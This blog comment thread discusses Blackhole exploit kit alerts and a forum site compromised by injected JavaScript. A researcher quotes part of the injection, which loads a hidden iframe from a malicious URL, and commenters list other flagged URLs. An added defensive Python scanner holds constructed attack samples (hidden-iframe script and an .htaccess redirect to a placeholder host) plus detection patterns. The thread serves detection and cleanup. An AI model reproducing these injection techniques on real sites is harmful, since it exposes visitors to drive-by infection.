@Enlightenment Umesh is not at Zscaler anymore. You can send me the code (please put it in a ZIP file with a password so it is not blocked by the AV) to jsobrier @ zscaler.com. I'll analyze it and will send you more details.

Jallil_Vlos said...

I am using Firefox, and I've had AVG 2012 trigger and block this "Blackhole Exploits Kit" almost a dozen times. Seeing how I've had that blasted "Windows Security 2012" virus, I'm glad that AVG is doing its job. So far, the Blackhole Exploits virus can't seem to bypass AVG.

I get on FB a lot, and don't do too much web browsing, but it looks like FB is the main culprit for me. I think it's been hacked (yet again), as have numerous e-mail services. I would recommend to those of you who don't have AVG to get it ASAP. It's free, and it does its job wonderfully!

Ben said...

Hi there
A number of users on our vBulletin forum at www.GT-Rider.com/thailand-motorcycle-forum/ are reporting "Blackhole exploits kit attacks."

Many reports list www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif as a problem, and/or another file in the images/statusicon/ directory. Neither GIF file exists... So far we've been unable to find anything on the site that appears to be a genuine threat...

AVG is the only online checker that reports any issues at all...

Do you have any way to reliably scrutinise our site? It's got both vBulletin forums and WordPress, which provides the outer CMS functions.

Kind regards
Ben
Webmaster / GT-Rider.com

Julien Sobrier said...

@ben hxxp://www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif contains a malicious piece of javascript in head: [script type='text/javascript']var a=!1;if(!document.cookie.match(...

It creates an invisible iframe to http://prick.it.pn/in.cgi?2

Ben said...

Hi Julien
Thanks for your input - the problem is, I cannot find that "hxxp://www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif" file in the site...

Using Smart FTP - cannot see the file
Using Cpanel File Manager - can't see it...

Any ideas on what to do next? :-)

We did find and remove the Blackhole exploit kit in WordPress, in JavaScript within the CF7 Calendar plugin.

Julien Sobrier said...

@Ben The page is a 404, meaning the file does not exist. The malicious code was inserted in the PHP template, or in the content stored in the database. You may want to look at the .htaccess files as well.
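A defender's check for the places Julien names (templates, stored content, .htaccess), added here as an example and not code from the thread or from Zscaler: it walks a web root and flags a script tag served under an image path (the smilie.gif case), the cookie-gated pattern quoted above, hidden or 1x1 iframes, and .htaccess rewrites that jump to an absolute URL. The sample files, the cookie name and the host malicious.example are constructed placeholders.

```python
import os
import re
import tempfile

# Constructed samples, not the real injected code (the thread quotes only "var a=!1;if(!document.cookie.match("); host malicious.example is a placeholder.
SAMPLES = {
    "images/editor/smilie.gif": (
        "<html><head><script type='text/javascript'>var a=!1;"
        "if(!document.cookie.match(/seen=1/)){document.cookie='seen=1';"
        "document.write('<iframe src=\"http://malicious.example/in.cgi?2\" "
        "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>')}"
        "</script></head></html>"),
    ".htaccess": "RewriteEngine On\nRewriteRule ^(.*)$ http://malicious.example/in.cgi?2 [R,L]\n",
    "index.php": "<html><body><iframe src=\"/embed\" width=\"640\"></iframe></body></html>",
}

def scan_text(text, path=""):  # findings for one file body (or one fetched response body)
    findings = []
    if re.search(r"\.(gif|png|jpe?g)$", path, re.I) and "<script" in text.lower():
        findings.append("script in image path")  # an image URL that returns HTML, as with smilie.gif
    if "document.cookie.match(" in text:  # fire-once-per-visitor gate from the quoted snippet
        findings.append("cookie-gated javascript")
    for tag in re.findall(r"<iframe[^>]*>", text, re.I):  # invisible or 1x1 iframe redirect
        if re.search(r"visibility\s*:\s*hidden|display\s*:\s*none|\b(width|height)\s*=\s*[\"']?[01][\"'\s>]", tag, re.I):
            src = re.search(r"src\s*=\s*[\"']([^\"']+)", tag, re.I)
            findings.append("hidden iframe to " + (src.group(1) if src else "?"))
    if os.path.basename(path) == ".htaccess":  # rewrite/redirect straight to an absolute URL
        for line in re.findall(r"^\s*(?:RewriteRule|Redirect)\b.*https?://.*", text, re.M):
            findings.append("external redirect: " + line.strip())
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".gif")):  # relative path -> findings
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower().endswith(exts) or name == ".htaccess":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read(), full)
                if hits:
                    results[os.path.relpath(full, root)] = hits
    return results

def demo():  # write the constructed samples into a temporary web root and scan it
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images", "editor"))
        for rel, body in SAMPLES.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run scan_tree against the document root and the database export; a file that only exists in the results, not on disk, points at template or database injection rather than a stray upload.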

Anonymous said...

I log on to my space and BAM! BLACKHOLE POP UP. MY NORTON BLOCKED IT.

andy said...

I got this on my forum as well. AVG said it blocked dreifo.in/index.php?showtopic=307515

Peake said...

AVG warns me that blackhole exploit kit is here:

http://samslovick.com/occupy-la/lapd-police-violence-at-occupy-la-m-17-video/

Anonymous said...

Hello, I have recently received a Blackhole exploit for the very first time, in repeated sessions on the Mozilla Firefox browser. It seems to happen on my e-mail and just when turning it on. Is there any way to remove the exploits? Or is this something my anti-virus can just keep blocking? Because it very well seems like it's blocking one or two at a time, increasing then decreasing. I usually run a virus scan every night. This is nuts.

Anonymous said...

I got a Blackhole exploit for the first time today on Firefox. Is there a way to remove the exploit? Also, thank god for AVG. This seemed to happen upon opening my Hotmail and just starting the browser up, period. It has also recently stopped attacking; however, I'm worried more so when it's lying dormant...

Anonymous said...

I was attacked by this link! How do I remove it? " ox-d.served-now.com/w/1.0/afr?auid=249042&cb=7494790648218637 " Is there a way to remove the Blackhole exploits?

Anonymous said...

lol, half of these "Anonymous" people claiming they were about to get infected from Hotmail are trolls

Anonymous said...

SourceFire claims they have detected a new version of the blackhole kit. What can you tell me about this latest version in comparison to the older version?

Julien Sobrier said...

@Anonymizer: we have blogged about the new version of the Blackhole exploit kit at http://research.zscaler.com/2012/10/blackhole-exploit-kit-v2-on-rise.html